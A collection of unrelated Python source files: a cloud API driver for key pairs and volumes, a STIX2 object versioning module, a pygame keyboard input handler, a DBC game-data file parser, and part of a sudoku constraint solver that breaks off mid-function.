:type name: ``str``
:param key_material: Public key material.
:type key_material: ``str``
:return: Imported key pair object.
:rtype: :class:`KeyPair`
"""
action = API_ROOT + '/ssh'
data = {'name': name, 'publicKey': key_material, 'region': location.id}
response = self.connection.request(action, data=data, method='POST')
return self._to_key_pair(response.object)
def delete_key_pair(self, name, location):
"""
Delete an existing key pair.
:param name: Key pair name.
:type name: ``str``
:keyword location: Key's region
:type location: :class:`NodeLocation`
:return: True of False based on success of Keypair deletion
:rtype: ``bool``
"""
action = API_ROOT + '/ssh/' + name
data = {'name': name, 'region': location.id}
self.connection.request(action, data=data, method='DELETE')
return True
def create_volume(self, size, location, name=None,
ex_volume_type='classic', ex_description=None):
"""
Create a volume.
:param size: Size of volume to create (in GB).
:type size: ``int``
:param name: Name of volume to create
:type name: ``str``
:keyword location: Location to create the volume in
:type location: :class:`NodeLocation` or ``None``
:keyword ex_volume_type: ``'classic'`` or ``'high-speed'``
:type ex_volume_type: ``str``
:keyword ex_description: Optionnal description of volume
:type ex_description: str
:return: Storage Volume object
:rtype: :class:`StorageVolume`
"""
action = API_ROOT + '/volume'
data = {
'region': location.id,
'size': str(size),
'type': ex_volume_type,
}
if name:
data['name'] = name
if ex_description:
data['description'] = ex_description
response = self.connection.request(action, data=data, method='POST')
return self._to_volume(response.object)
def destroy_volume(self, volume):
action = API_ROOT + '/volume/' + volume.id
self.connection.request(action, method='DELETE')
return True
def list_volumes(self, location=None):
"""
Return a list of volumes.
:keyword location: Location use for filter
:type location: :class:`NodeLocation` or ``None``
:return: A list of volume objects.
:rtype: ``list`` of :class:`StorageVolume`
"""
action = API_ROOT + '/volume'
data = {}
if location:
data['region'] = location.id
response = self.connection.request(action, data=data)
return self._to_volumes(response.object)
def ex_get_volume(self, volume_id):
"""
Return a Volume object based on a volume ID.
:param volume_id: The ID of the volume
:type volume_id: ``int``
:return: A StorageVolume object for the volume
:rtype: :class:`StorageVolume`
"""
action = API_ROOT + '/volume/' + volume_id
response = self.connection.request(action)
return self._to_volume(response.object)
def attach_volume(self, node, volume, device=None):
"""
Attach a volume to a node.
:param node: Node where to attach volume
:type node: :class:`Node`
:param volume: The ID of the volume
:type volume: :class:`StorageVolume`
:param device: Unsed parameter
:return: True or False representing operation successful
:rtype: ``bool``
"""
action = '%s/volume/%s/attach' % (API_ROOT, volume.id)
data = {'instanceId': node.id}
self.connection.request(action, data=data, method='POST')
return True
def detach_volume(self, volume, ex_node=None):
"""
Detach a volume to a node.
:param volume: The ID of the volume
:type volume: :class:`StorageVolume`
:param ex_node: Node to detach from (optionnal if volume is attached
to only one node)
:type ex_node: :class:`Node`
:return: True or False representing operation successful
:rtype: ``bool``
:raises: Exception: If ``ex_node`` is not provided and more than one
node is attached to the volume
"""
action = '%s/volume/%s/detach' % (API_ROOT, volume.id)
if ex_node is None:
if len(volume.extra['attachedTo']) != 1:
err_msg = "Volume '%s' has more or less than one attached \
nodes, you must specify one."
raise Exception(err_msg)
ex_node = self.ex_get_node(volume.extra['attachedTo'][0])
data = {'instanceId': ex_node.id}
self.connection.request(action, data=data, method='POST')
return True
def _to_volume(self, obj):
extra = obj.copy()
extra.pop('id')
extra.pop('name')
extra.pop('size')
state = self.VOLUME_STATE_MAP.get(obj.pop('status', None),
StorageVolumeState.UNKNOWN)
return StorageVolume(id=obj['id'], name=obj['name'], size=obj['size'],
state=state, extra=extra, driver=self)
def _to_volumes(self, objs):
return [self._to_volume(obj) for obj in objs]
def _to_location(self, obj):
location = self.connection.LOCATIONS[obj]
return NodeLocation(driver=self, **location)
def _to_locations(self, objs):
return [self._to_location(obj) for obj in objs]
def _to_node(self, obj):
extra = obj.copy()
if 'flavorId' in extra:
public_ips = [obj.pop('ip')]
else:
ip = extra.pop('ipv4')
public_ips = [ip] if ip else []
del extra['instanceId']
del extra['name']
return Node(id=obj['instanceId'], name=obj['name'],
state=self.NODE_STATE_MAP[obj['status']],
public_ips=public_ips, private_ips=[], driver=self,
extra=extra)
def _to_nodes(self, objs):
return [self._to_node(obj) for obj in objs]
def _to_size(self, obj):
extra = {'vcpus': obj['vcpus'], 'type': obj['type'],
'region': obj['region']}
return NodeSize(id=obj['id'], name=obj['name'], ram=obj['ram'],
disk=obj['disk'], bandwidth=None, price=None,
driver=self, extra=extra)
def _to_sizes(self, objs):
return [self._to_size(obj) for obj in objs]
def _to_image(self, obj):
extra = {'region': obj['region'], 'visibility': obj['visibility'],
'deprecated': obj['deprecated']}
return NodeImage(id=obj['id'], name=obj['name'], driver=self,
extra=extra)
def _to_images(self, objs):
return [self._to_image(obj) for obj in objs]
def _to_key_pair(self, obj):
extra = {'region': obj['region']}
return OpenStackKeyPair(name=obj['name'], public_key=obj['publicKey'],
driver=self, fingerprint=obj['fingerPrint'],
extra=extra)
def _to_key_pairs(self, objs):
return [self._to_key_pair(obj) for obj in objs]
def _ex_connection_class_kwargs(self):
return {'ex_consumer_key': self.consumer_key}
def _add_required_headers(self, headers, method, action, data, timestamp):
timestamp = self.connection.get_timestamp()
signature = self.connection.make_signature(method, action, data,
str(timestamp))
headers.update({
'X-Ra-Timestamp': timestamp,
'X-Ra-Signature': signature
})
|
|
"""STIX2 core versioning methods."""
from collections.abc import Mapping
import copy
import datetime as dt
import itertools
import uuid
import stix2.base
import stix2.registry
from stix2.utils import (
detect_spec_version, get_timestamp, is_sco, parse_into_datetime,
)
import stix2.v20
from .exceptions import (
InvalidValueError, ObjectNotVersionableError, RevokeError,
TypeNotVersionableError, UnmodifiablePropertyError,
)
# STIX object properties that cannot be modified
STIX_UNMOD_PROPERTIES = ['created', 'created_by_ref', 'id', 'type']
_VERSIONING_PROPERTIES = {"created", "modified", "revoked"}
def _fudge_modified(old_modified, new_modified, use_stix21):
"""
Ensures a new modified timestamp is newer than the old. When they are
too close together, new_modified must be pushed further ahead to ensure
it is distinct and later, after JSON serialization (which may mean it's
actually being pushed a little ways into the future). JSON serialization
can remove precision, which can cause distinct timestamps to accidentally
become equal, if we're not careful.
:param old_modified: A previous "modified" timestamp, as a datetime object
:param new_modified: A candidate new "modified" timestamp, as a datetime
object
:param use_stix21: Whether to use STIX 2.1+ versioning timestamp precision
rules (boolean). This is important so that we are aware of how
timestamp precision will be truncated, so we know how close together
the timestamps can be, and how far ahead to potentially push the new
one.
:return: A suitable new "modified" timestamp. This may be different from
what was passed in, if it had to be pushed ahead.
"""
if use_stix21:
# 2.1+: we can use full precision
if new_modified <= old_modified:
new_modified = old_modified + dt.timedelta(microseconds=1)
else:
# 2.0: we must use millisecond precision
one_ms = dt.timedelta(milliseconds=1)
if new_modified - old_modified < one_ms:
new_modified = old_modified + one_ms
return new_modified
def _get_stix_version(data):
"""
Bit of factored out functionality for getting/detecting the STIX version
of the given value.
:param data: An object, e.g. _STIXBase instance or dict
:return: The STIX version as a string in "X.Y" notation, or None if the
version could not be determined.
"""
stix_version = None
if isinstance(data, Mapping):
# First, determine spec version. It's easy for our stix2 objects; more
# work for dicts.
if isinstance(data, stix2.v20._STIXBase20):
stix_version = "2.0"
elif isinstance(data, stix2.v21._STIXBase21):
stix_version = "2.1"
elif isinstance(data, dict):
stix_version = detect_spec_version(data)
return stix_version
def _is_versionable_type(data):
"""
Determine whether type of the given object is versionable. This check is
done on the basis of support for three properties for the object type:
"created", "modified", and "revoked". If all three are supported, the
object type is versionable; otherwise it is not. Dicts must have a "type"
property. This is used in STIX version detection and to determine a
complete set of supported properties for the type.
If a dict is passed whose "type" is unregistered, then this library has no
knowledge of the type. It can't determine what properties are "supported".
This function will be lax and treat the type as versionable.
Note that this support check is not sufficient for creating a new object
version. Support for the versioning properties does not mean that
sufficient properties are actually present on the object.
Also, detect whether it represents a STIX 2.1 or greater spec version.
:param data: The object to check. Must be either a stix object, or a dict
with a "type" property.
:return: A 2-tuple: the first element is True if the object is versionable
and False if not; the second is the STIX version as a string in "X.Y"
notation.
"""
is_versionable = False
stix_version = None
if isinstance(data, Mapping):
# First, determine spec version
stix_version = _get_stix_version(data)
# Then, determine versionability.
if isinstance(data, stix2.base._STIXBase):
is_versionable = _VERSIONING_PROPERTIES.issubset(
data._properties,
)
elif isinstance(data, dict):
# Tougher to handle dicts. We need to consider STIX version,
# map to a registered class, and from that get a more complete
# picture of its properties.
cls = stix2.registry.class_for_type(data.get("type"), stix_version)
if cls:
is_versionable = _VERSIONING_PROPERTIES.issubset(
cls._properties,
)
else:
# The type is not registered, so we have no knowledge of
# what properties are supported. Let's be lax and let them
# version it.
is_versionable = True
return is_versionable, stix_version
def _check_versionable_object(data):
"""
Determine whether there are or may be sufficient properties present on
an object to allow versioning. Raises an exception if the object can't be
versioned.
Also detect STIX spec version.
:param data: The object to check, e.g. dict with a "type" property, or
_STIXBase instance
:return: True if the object is STIX 2.1+, or False if not
:raises TypeNotVersionableError: If the object didn't have the versioning
properties and the type was found to not support them
:raises ObjectNotVersionableError: If the type was found to support
versioning but there were insufficient properties on the object
"""
if isinstance(data, Mapping):
if data.keys() >= _VERSIONING_PROPERTIES:
# If the properties all already exist in the object, assume they
# are either supported by the type, or are custom properties, and
# allow versioning.
stix_version = _get_stix_version(data)
else:
is_versionable_type, stix_version = _is_versionable_type(data)
if is_versionable_type:
# The type supports the versioning properties (or we don't
# recognize it and just assume it does). The question shifts
# to whether the object has sufficient properties to create a
# new version. Just require "created" for now. We need at
# least that as a starting point for new version timestamps.
is_versionable = "created" in data
if not is_versionable:
raise ObjectNotVersionableError(data)
else:
raise TypeNotVersionableError(data)
else:
raise TypeNotVersionableError(data)
return stix_version
def new_version(data, allow_custom=None, **kwargs):
"""
Create a new version of a STIX object, by modifying properties and
updating the ``modified`` property.
:param data: The object to create a new version of. Maybe a stix2 object
or dict.
:param allow_custom: Whether to allow custom properties on the new object.
If True, allow them (regardless of whether the original had custom
properties); if False disallow them; if None, auto-detect from the
object: if it has custom properties, allow them in the new version,
otherwise don't allow them.
:param kwargs: The properties to change. Setting to None requests property
removal.
:return: The new object.
"""
stix_version = _check_versionable_object(data)
if data.get('revoked'):
raise RevokeError("new_version")
try:
new_obj_inner = copy.deepcopy(data._inner)
except AttributeError:
new_obj_inner = copy.deepcopy(data)
# Make sure certain properties aren't trying to change
# ID contributing properties of 2.1+ SCOs may also not change if a UUIDv5
# is in use (depending on whether they were used to create it... but they
# probably were). That would imply an ID change, which is not allowed
# across versions.
sco_locked_props = []
if is_sco(data, "2.1"):
uuid_ = uuid.UUID(data["id"][-36:])
if uuid_.variant == uuid.RFC_4122 and uuid_.version == 5:
if isinstance(data, stix2.base._Observable):
cls = data.__class__
else:
cls = stix2.registry.class_for_type(
data["type"], stix_version, "observables",
)
sco_locked_props = cls._id_contributing_properties
unchangable_properties = set()
for prop in itertools.chain(STIX_UNMOD_PROPERTIES, sco_locked_props):
if prop in kwargs:
unchangable_properties.add(prop)
if unchangable_properties:
raise UnmodifiablePropertyError(unchangable_properties)
# Different versioning precision rules in STIX 2.0 vs 2.1, so we need
# to know which rules to apply.
precision_constraint = "min" if stix_version == "2.1" else "exact"
old_modified = data.get("modified") or data.get("created")
old_modified = parse_into_datetime(
old_modified, precision="millisecond",
precision_constraint=precision_constraint,
)
cls = type(data)
if 'modified' in kwargs:
new_modified = parse_into_datetime(
kwargs['modified'], precision='millisecond',
precision_constraint=precision_constraint,
)
if new_modified <= old_modified:
raise InvalidValueError(
cls, 'modified',
"The new modified datetime cannot be before than or equal to the current modified datetime."
"It cannot be equal, as according to STIX 2 specification, objects that are different "
"but have the same id and modified timestamp do not have defined consumer behavior.",
)
else:
new_modified = get_timestamp()
new_modified = _fudge_modified(
old_modified, new_modified, stix_version != "2.0",
)
kwargs['modified'] = new_modified
new_obj_inner.update(kwargs)
# Set allow_custom appropriately if versioning an object. We will ignore
# it for dicts.
if isinstance(data, stix2.base._STIXBase):
if allow_custom is None:
new_obj_inner["allow_custom"] = data.has_custom
else:
new_obj_inner["allow_custom"] = allow_custom
# Exclude properties with a value of 'None' in case data is not an instance of a _STIXBase subclass
return cls(**{k: v for k, v in new_obj_inner.items() if v is not None})
def revoke(data):
"""Revoke a STIX object.
Returns:
A new version of the object with ``revoked`` set to ``True``.
"""
if not isinstance(data, Mapping):
raise ValueError(
"cannot revoke object of this type! Try a dictionary "
"or instance of an SDO or SRO class.",
)
if data.get('revoked'):
raise RevokeError("revoke")
return new_version(data, revoked=True)
def remove_custom_stix(stix_obj):
"""Remove any custom STIX objects or properties.
Warnings:
This function is a best effort utility, in that it will remove custom
objects and properties based on the type names; i.e. if "x-" prefixes
object types, and "x\\_" prefixes property types. According to the
STIX2 spec, those naming conventions are a SHOULDs not MUSTs, meaning
that valid custom STIX content may ignore those conventions and in
effect render this utility function invalid when used on that STIX
content.
Args:
stix_obj (dict OR python-stix obj): a single python-stix object
or dict of a STIX object
Returns:
A new version of the object with any custom content removed
"""
if stix_obj['type'].startswith('x-'):
# if entire object is custom, discard
return None
custom_props = {
k: None
for k in stix_obj if k.startswith("x_")
}
if custom_props:
new_obj = new_version(stix_obj, allow_custom=False, **custom_props)
return new_obj
else:
return stix_obj
|
|
# keyboardString.py
# Used to get a string of text entered by the user
import pygame, sys
from pygame.locals import *
from Tkinter import Tk
class keyboardString(object):
def __init__(self, string):
self.string = string
self.start = 0
self.end = 0
self.cursor = 0
def addKeyPress(self, keyCode): # THIS METHOD NOT DONE YET
keyMods = pygame.key.get_mods()
if keyMods & KMOD_CTRL == 0:
k = ""
if (keyMods & KMOD_SHIFT != 0):
if keyCode in ks.keys():
k = ks[keyCode]
elif keyCode in kn.keys():
k = kn[keyCode]
else:
if keyCode in kn.keys():
k = kn[keyCode]
if len(k) > 0:
self.string = self.string[0:self.start] + k + self.string[self.end:]
self.start += 1
self.cursor = self.end = self.start
return
if keyCode == K_BACKSPACE:
if self.start == self.end:
if self.start != 0:
self.string = self.string[0:self.start - 1] + self.string[self.end:]
self.start -= 1
if self.start < 0:
self.start = 0
self.cursor = self.end = self.start
else:
self.string = self.string[0:self.start] + self.string[self.end:]
self.cursor = self.end = self.start
elif keyCode == K_DELETE:
if self.start == self.end:
self.string = self.string[0:self.start] + self.string[self.end + 1:]
else:
self.string = self.string[0:self.start] + self.string[self.end:]
self.cursor = self.end = self.start
elif keyCode == K_RIGHT:
if keyMods & KMOD_SHIFT != 0:
if self.start == self.end:
self.end += 1
if self.end > len(self.string):
self.end = len(self.string)
self.cursor = self.end
else:
if self.cursor == self.start:
self.start += 1
self.cursor = self.start
else:
self.end += 1
if self.end > len(self.string):
self.end = len(self.string)
self.cursor = self.end
else:
if self.start == self.end:
self.start += 1
if self.start > len(self.string):
self.start = len(self.string)
self.cursor = self.end = self.start
else:
self.cursor = self.start = self.end
elif keyCode == K_LEFT:
if keyMods & KMOD_SHIFT != 0:
if self.start == self.end:
self.start -= 1
if (self.start < 0):
self.start = 0
self.cursor = self.start
else:
if self.cursor == self.start:
self.start -= 1
if (self.start < 0):
self.start = 0
self.cursor = self.start
else:
self.start += 1
self.cursor = self.end
else:
if self.start == self.end:
self.start -= 1
if (self.start < 0):
self.start = 0
self.cursor = self.end = self.start
else:
self.cursor = self.end = self.start
elif keyCode == K_HOME:
if keyMods & KMOD_SHIFT != 0:
self.start = 0
else:
self.cursor = self.end = self.start = 0
elif keyCode == K_END:
if keyMods & KMOD_SHIFT != 0:
self.end = len(self.string)
else:
self.cursor = self.start = self.end = len(self.string)
elif keyCode == K_c and (keyMods & KMOD_CTRL != 0):
tk = Tk()
tk.withdraw()
tk.clipboard_clear()
tk.clipboard_append(self.string[self.start:self.end])
tk.destroy()
elif keyCode == K_v and (keyMods & KMOD_CTRL != 0):
tk = Tk()
tk.withdraw()
clipboard = tk.selection_get(selection = "CLIPBOARD")
tk.destroy()
self.string = self.string[:self.start] + clipboard + self.string[self.end:]
self.cursor = self.start = self.end + len(clipboard)
elif keyCode == K_x and (keyMods & KMOD_CTRL != 0):
tk = Tk()
tk.withdraw()
tk.clipboard_clear()
tk.clipboard_append(self.string[self.start:self.end])
tk.destroy()
self.string = self.string[:self.start] + self.string[self.end:]
elif keyCode == K_a and (keyMods & KMOD_CTRL != 0):
self.start = 0
self.cursor = self.end = len(self.string)
def setCursorPosition(self, position):
if position < 0:
self.cursor = self.start = self.end = 0
elif position > len(self.string):
self.cursor = self.start = self.end = len(self.string)
else:
self.cursor = self.start = self.end = position
def setSelection(self, startDrag, endDrag):
if endDrag > startDrag:
self.start = startDrag
self.end = endDrag
else:
self.start = endDrag
self.end = startDrag
if self.start < 0:
self.start = 0
if self.end > len(self.string):
self.end = len(self.string)
if endDrag > startDrag:
self.cursor = self.end
else:
self.cursor = self.start
kn = dict()
ks = dict()
def initKeyStrings():
for charValue in range(K_a, K_z):
kn[charValue] = chr(charValue)
ks[charValue] = chr(charValue - 32)
for charValue in range(K_0, K_9):
kn[charValue] = chr(charValue)
for charValue in range(K_KP0, K_KP9):
kn[charValue] = chr(charValue - 208)
ks[K_0] = ')'
ks[K_1] = '!'
ks[K_2] = '@'
ks[K_3] = '#'
ks[K_4] = '$'
ks[K_5] = '%'
ks[K_6] = '^'
ks[K_7] = '&'
ks[K_8] = '*'
ks[K_9] = '('
kn[K_COMMA] = chr(K_COMMA)
ks[K_COMMA] = '<'
kn[K_PERIOD] = chr(K_PERIOD)
ks[K_PERIOD] = '>'
kn[K_SLASH] = chr(K_SLASH)
ks[K_SLASH] = '?'
kn[K_SEMICOLON] = chr(K_SEMICOLON)
ks[K_SEMICOLON] = ':'
kn[K_QUOTE] = chr(K_QUOTE)
ks[K_QUOTE] = '"'
kn[K_LEFTBRACKET] = chr(K_LEFTBRACKET)
ks[K_LEFTBRACKET] = '{'
kn[K_RIGHTBRACKET] = chr(K_RIGHTBRACKET)
ks[K_RIGHTBRACKET] = '}'
kn[K_BACKSLASH] = chr(K_BACKSLASH)
ks[K_BACKSLASH] = '|'
kn[K_MINUS] = chr(K_MINUS)
ks[K_MINUS] = '_'
kn[K_EQUALS] = chr(K_EQUALS)
ks[K_EQUALS] = '+'
kn[K_BACKQUOTE] = chr(K_BACKQUOTE)
ks[K_BACKQUOTE] = '~'
kn[K_RETURN] = '\n'
kn[K_TAB] = '\t'
kn[K_SPACE] = ' '
kn[K_KP_PERIOD] = '.'
kn[K_KP_ENTER] = '\n'
kn[K_KP_PLUS] = '+'
kn[K_KP_MINUS] = '-'
kn[K_KP_MULTIPLY] = '*'
kn[K_KP_DIVIDE] = '/'
|
|
# -*- coding: utf-8 -*-
from collections import namedtuple
from struct import pack, unpack
from .log import log
from .main import DBFile
from .structures import fields, StructureNotFound, getstructure, LocalizedStringField, LocalizedField
from .utils import getfilename, generate_structure
SEEK_CUR = 1 # os.SEEK_CUR
SEEK_END = 2 # os.SEEK_END
class DBCFile(DBFile):
"""
A DBC file.
- Each file has an arbitrary amount of columns always of the same length and
structure (defined in the header).
- Each string is a 32-bit pointer to an address inside the stringblock, starting
from 0 as the stringblock address (defined in the header as well).
- EOF is 1 NULL byte, followed by the stringblock if there is one.
- The stringblock is a non-repetitive block of null-terminated strings.
"""
def _readHeader(self):
self.headerStructure = "<4s4i"
data = self.file.read(20)
DBCHeader = namedtuple("DBCHeader", ["signature", "row_count", "field_count", "reclen", "stringblocksize"])
self.header = DBCHeader(*unpack(self.headerStructure, data))
def _readAddresses(self):
rows = 0
field = self.structure[0]
row_header_size = field.size
reclen = self.header.reclen
while rows < self.header.row_count:
address = self.file.tell() # Get the address of the full row
id = self._parse_field(self.file, field)
self._add_row(id, address, reclen)
self.file.seek(reclen - row_header_size, SEEK_CUR) # minus length of id
rows += 1
def _checkPadding(self, file, field):
"""
In 4.0.0 DBCs, fields are padded to their own size
within the file. Example:
byte, int -> byte, pad, pad, pad, int
"""
address = file.tell()
seek = (address % field.size)
seek = seek and -(seek - field.size)
file.seek(seek, SEEK_CUR)
def setStructure(self, structure):
name = getfilename(self.file.name)
try:
self.structure = getstructure(name, self.build, parent=self)
except StructureNotFound:
self.structure = generate_structure(self)
# Generate the Localized Fields
fieldidx = []
for i, field in enumerate(self.structure):
if isinstance(field, LocalizedField):
fieldidx.append((i, field.name))
if fieldidx:
from copy import copy
fields = LocalizedStringField(build=self.build)
for i, name in reversed(fieldidx):
# Build a copy of the fields
toinsert = [copy(field).rename("%s_%s" % (name, field.name)) for field in fields]
self.structure[i:i+1] = toinsert
log.info("Using %s build %i" % (self.structure, self.build))
self.check_integrity()
def _parse_field(self, data, field, row=None):
if self.build in (11927, 12025):
self._checkPadding(data, field)
return super(DBCFile, self)._parse_field(data, field, row)
def _parse_row(self, id):
address, reclen = self._addresses[id]
self.file.seek(address)
data = self.file.read(reclen) # We also read id and reclen columns
row = self.parse_row(data) # assign to DBRow
self._values[id] = row
def _parse_string(self, data):
address, = unpack("<I", data.read(4))
if not address:
return ""
f = self.file
pos = f.tell()
# NOTE: Avoid seeking with SEEK_END because of a bug in stormlib 8.04
# f.seek(-self.header.stringblocksize + address)
# address of the string within the string block
size = self.size()
if address > size:
#log.warning("File says there is a string at address %i. File is only %i bytes! Corruption?" % (address, size))
return ""
stringAddress = (size - self.header.stringblocksize + address)
f.seek(stringAddress)
# Read until \0
chars = []
while True:
char = f.read(1)
if char == "\0":
break
if not char:
# We reached EOF before the string was finished.
log.warning("Unfinished string, premature EOF. File is corrupt.")
if not chars:
log.warning("No string found at 0x%08x (%i). Corruption?" % (address, address - self.header.stringblocksize))
return ""
break
else:
chars.append(char)
f.seek(pos)
return "".join(chars)
def check_integrity(self):
reclen = self.header.reclen
struct_len = self.structure._reclen()
if struct_len != reclen:
log.warning("%r does not respect DBC reclen. Expected %i, reading %i. (%+i)" % (self.structure, reclen, struct_len, reclen-struct_len))
field_count = self.header.field_count
total_fields = len(self.structure)
if field_count != total_fields:
log.warning("%r does not respect DBC field count. Expected %i, got %i instead." % (self.structure, field_count, total_fields))
def data(self):
ret = []
self._stringBlock = []
address_lookup = {}
address = 1
for row in self:
row = self[row]
row._save()
_data = []
for field, value in zip(self.structure, row):
if isinstance(field, fields.StringField):
if not value:
_value = 0
elif value in address_lookup: # the string is already in the stringblock
_value = address_lookup[value]
else:
_value = address
address_lookup[value] = address
self._stringBlock.append(value)
address += len(value) + 1
value = pack("<I", _value)
else:
value = pack("<%s" % (field.char), value)
_data.append(value)
ret.append("".join(_data))
return "".join(ret)
def headerData(self):
return pack(self.headerStructure, *self.header)
def eof(self):
return "\0" + ("\0".join(self._stringBlock)) + "\0"
class WCFFile(DBCFile):
"""
Pretty much a DBC file without a header.
Currently only used with baddons.wcf.
"""
def preload(self):
f = self.file
f.seek(0)
rows = 0
field = self.structure[0]
reclen = sum(k.size for k in self.structure)
row_header_size = field.size
while True:
address = f.tell() # Get the address of the full row
id = self._parse_field(f, field)
if id is None:
break
self._add_row(id, address, reclen)
f.seek(reclen - row_header_size, SEEK_CUR) # minus length of id
rows += 1
class InferredDBCFile(DBCFile):
"""
DBCFile with implicit ordering. These files have no IDField.
"""
def preload(self):
f = self.file
f.seek(len(self.header))
rows = 0
reclen = self.header.reclen
while rows < self.header.row_count:
address = f.tell() # Get the address of the full row
id = rows + 1
self._addresses[id] = (address, reclen)
f.seek(reclen, SEEK_CUR)
rows += 1
class UnknownDBCFile(DBCFile):
"""
A DBC file with an unknown structure.
"""
writable = False
def load_structure(self, filename=None, build=None):
self.structure = self._generate_structure()
log.warn("Using generated structure for file %s, build %i" % (self.filename, self.build))
|
|
import logging
assignments = []
def assign_value(values, box, value):
"""
Please use this function to update your values dictionary!
Assigns a value to a given box. If it updates the board record it.
"""
values[box] = value
if len(value) == 1:
assignments.append(values.copy())
return values
def shared_subgroup(values):
"""
Eliminate values by using the shared subgroup strategy.
Args:
values(dict): a dictionary of the form {'box_name': '123456789', ...}
Returns:
the values dictionary after appling the shared subgroup rule.
"""
tmp_vals = values.copy()
rows = 'ABCDEFGHI'
cols = '123456789'
# Generate all boxes and units
boxes = cross(rows,cols)
vertical_units = [ cross(rows,col) for col in cols ]
horizontal_units = [ cross(row,cols) for row in rows ]
squared_units = [ cross(row,col) for row in ['ABC', 'DEF', 'GHI'] for col in ['123','456','789'] ]
diagonal_units = [ [row+col for row,col in zip(rows,cols)], [row+col for row,col in zip(rows,cols[::-1])] ]
# For shared subgroups we only have to iterate of 'linear' units, we will deal with the squares later
unit_list = vertical_units + horizontal_units + diagonal_units
# We will iterate over every possible number
numbers = '123456789'
for num in numbers:
for unit in unit_list:
# Get all the boxes that contain the current number
boxes = [ box for box in unit if num in tmp_vals[box] ]
# Only continue if there is more than one box that could contain that number (otherwise it
# is already assigned)
if len(boxes) > 1:
# Check if all possible locations are inside the same square
for square in squared_units:
if all( b in square for b in boxes ):
# If so, discard the number from all other boxes inside that square
for b in square:
if b not in boxes:
logging.debug("Shared Subgroup: Removing %s from %s",num,b)
tmp_vals[b] = tmp_vals[b].replace(num,'')
return tmp_vals
def naked_twins(values):
"""Eliminate values using the naked twins strategy.
Args:
values(dict): a dictionary of the form {'box_name': '123456789', ...}
Returns:
the values dictionary with the naked twins eliminated from peers.
"""
tmp_vals = values.copy()
rows = 'ABCDEFGHI'
cols = '123456789'
# Generate all boxes and units
boxes = cross(rows,cols)
vertical_units = [ cross(rows,col) for col in cols ]
horizontal_units = [ cross(row,cols) for row in rows ]
squared_units = [ cross(row,col) for row in ['ABC', 'DEF', 'GHI'] for col in ['123','456','789'] ]
diagonal_units = [ [row+col for row,col in zip(rows,cols)], [row+col for row,col in zip(rows,cols[::-1])] ]
# Put them all in a single list for easier processing
unit_list = vertical_units + horizontal_units + squared_units + diagonal_units
for unit in unit_list:
# Twins are pairs of boxes that each contain the same two values
twins = [ (box1,box2) for box1 in unit for box2 in unit if len(tmp_vals[box1]) == 2
and tmp_vals[box1] == tmp_vals[box2] and box1 != box2 ]
# We can safely discard the 'twin values' from all other boxes within this unit
for twin in twins:
# There are exactly two values for a twin, so this is safe:
twin1 = tmp_vals[twin[0]][0]
twin2 = tmp_vals[twin[0]][1]
for box in unit:
# Of course the naked twins have to keep their values
if box not in twin:
logging.debug("Naked Twins: Removing %s and %s from %s",twin1,twin2,box)
tmp_vals[box] = tmp_vals[box].replace(twin1,'')
tmp_vals[box] = tmp_vals[box].replace(twin2,'')
return tmp_vals
def cross(A, B):
"""Calculate the cross product of two arrays.
Args:
A(list) - the left side of the cross product
B(list) - the right side of the cross product
Returns:
A list containing all possible combinations of elements from A and B
"""
return [ s+t for s in A for t in B ]
def grid_values(grid):
"""
Convert grid into a dict of {square: char} with '123456789' for empties.
Args:
grid(string) - A grid in string form.
Returns:
A grid in dictionary form
Keys: The boxes, e.g., 'A1'
Values: The value in each box, e.g., '8'. If the box has no value, then the value will be '123456789'.
"""
rows = 'ABCDEFGHI'
cols = '123456789'
boxes = cross(rows,cols)
values = {}
for ii in range(len(boxes)):
values[boxes[ii]] = grid[ii].replace('.','123456789')
return values
def display(values):
"""
Display the values as a 2-D grid.
Input: The sudoku in dictionary form
Output: None
"""
rows = 'ABCDEFGHI'
cols = '123456789'
# Generate all boxes
boxes = cross(rows,cols)
width = 1+max(len(values[s]) for s in boxes)
line = '+'.join(['-'*(width*3)]*3)
for r in rows:
print(''.join(values[r+c].center(width)+('|' if c in '36' else '')
for c in cols))
if r in 'CF': print(line)
return
def eliminate(values):
"""
Eliminate all values from boxes inside a unit that are already bound to a box.
Args:
values(dict) - Sudoku grid as a dictionary
Keys: The boxes, e.g., 'A1'
Values: All possible values for a box
Returns:
The grid dictionary, stripped off all values that are already bound.
"""
# Make a copy of the dictionary
tmp_vals = values.copy()
rows = 'ABCDEFGHI'
cols = '123456789'
# Generate all boxes and units
boxes = cross(rows,cols)
vertical_units = [ cross(rows,col) for col in cols ]
horizontal_units = [ cross(row,cols) for row in rows ]
squared_units = [ cross(row,col) for row in ['ABC', 'DEF', 'GHI'] for col in ['123','456','789'] ]
diagonal_units = [ [row+col for row,col in zip(rows,cols)], [row+col for row,col in zip(rows,cols[::-1])] ]
# Put them all in a single list for easier processing
unit_list = vertical_units + horizontal_units + squared_units + diagonal_units
# These boxes are already assigned a single value
solved_boxes = [ box for box in boxes if len(values[box]) == 1 ]
# Eliminate those values from all boxes within a unit that are already taken
for box in solved_boxes:
for unit in unit_list:
if box in unit:
num = values[box]
for b in unit:
if b != box:
logging.debug("Eliminate: Removing %s from %s",num,b)
assign_value(values,b,tmp_vals[b].replace(num,''))
tmp_vals[b] = tmp_vals[b].replace(num,'')
# And finally return the modified version of the grid dictionary
return tmp_vals
def only_choice(values):
"""
Assign a value to a box if no other box within the same unit can take this value.
Arg:
values(dict) - Sudoku grid as a dictionary
Keys: The boxes, e.g., 'A1'
Values: All possible values for a box
Returns:
The grid dictionary after assigning all only choices
"""
# Make a copy of the dictionary
tmp_vals = values.copy()
rows = 'ABCDEFGHI'
cols = '123456789'
# We need all units again
vertical_units = [ cross(rows,col) for col in cols ]
horizontal_units = [ cross(row,cols) for row in rows ]
squared_units = [ cross(row,col) for row in ['ABC', 'DEF', 'GHI'] for col in ['123','456','789'] ]
diagonal_units = [ [row+col for row,col in zip(rows,cols)], [row+col for row,col in zip(rows,cols[::-1])] ]
# Put them all in a single list for easier processing
unit_list = vertical_units + horizontal_units + squared_units + diagonal_units
for unit in unit_list:
for box in unit:
# Fetch the possible values for all cells within this unit except for the one we are looking at
numstring = ''
for b in unit:
if b != box:
numstring += tmp_vals[b]
# If there is a value that does not occur anywhere else, assigned it and return to the outer loop
for num in values[box]:
if num not in numstring:
logging.debug("Only Choice: assigning %s to %s",num,box)
assign_value(values,box,num)
tmp_vals[box] = num
break
return tmp_vals
def reduce_puzzle(values):
"""
Apply only_choice and eliminate until there is no further improvement
Args:
values(dict) - Sudoku grid as a dictionary
Keys: The boxes, e.g., 'A1'
Values: All possible values for a box
Returns:
